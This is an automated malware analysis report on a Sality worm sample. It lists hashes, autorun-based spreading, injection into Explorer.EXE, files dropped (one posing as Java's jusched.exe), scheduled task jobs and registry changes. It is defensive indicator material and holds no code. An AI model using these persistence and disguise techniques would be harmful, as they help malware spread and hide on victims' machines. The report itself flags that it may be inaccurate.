Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Worm, Virus, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: df19badc8d07c6bee18a57e61ea387c2
SHA1: 2b7c6da2e61c98224b23f712beeaf74ba38c0787
SHA256: 3b08960f3416e9adf2f25fc702b4bbff4a716875de20f7035615ce17b717e588
SSDeep: 393216:Jm27XOLzs3pUzZyj2wps8oEmTRoUeBxI:Jm27gzs3pUzMjfGoUe
Size: 13067784 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: YourTemplateFinder
Created at: 2012-12-04 15:55:11
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Worm. A program that is primarily replicating on networks or removable drives.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Worm creates the following process(es):
Ge-Force-codedownloader.exe:2504
Ge-Force-codedownloader.exe:2564
regsvr32.exe:2416
Khtmovq.exe:664
%original file name%.exe:1616
mscorsvw.exe:172
Ge-Force-bg.exe:2632
The Worm injects its code into the following process(es):
Explorer.EXE:2032
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process Ge-Force-codedownloader.exe:2564 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)
The process Khtmovq.exe:664 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\184[1].js (25 bytes)
%Program Files%\Ge-Force\utils.exe (86583 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (35246 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (415 bytes)
%Program Files%\Ge-Force\Ge-Force.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\288[1].js (551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (1 bytes)
%Program Files%\Ge-Force\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\337[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (3312 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\262[1].js (25 bytes)
%Program Files%\Ge-Force\Ge-Force-codedownloader.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (141808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (784 bytes)
%Program Files%\Ge-Force\Ge-Force-bho.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (5 bytes)
%Program Files%\Ge-Force\Ge-Force-bg.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (410 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB7.tmp (662466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\356[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\350[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (997 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (31281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\91[1].js (86817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (1552 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (14 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\ipgeoapi[1] (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\app_code[1].js (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\desktop.ini (67 bytes)
%Program Files%\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe (7726 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (0 bytes)
The process %original file name%.exe:1616 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (4404939 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0014C62D_Rar\%original file name%.exe (99596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (419460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (2426 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB4.tmp (0 bytes)
Registry activity
The process Ge-Force-codedownloader.exe:2504 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"
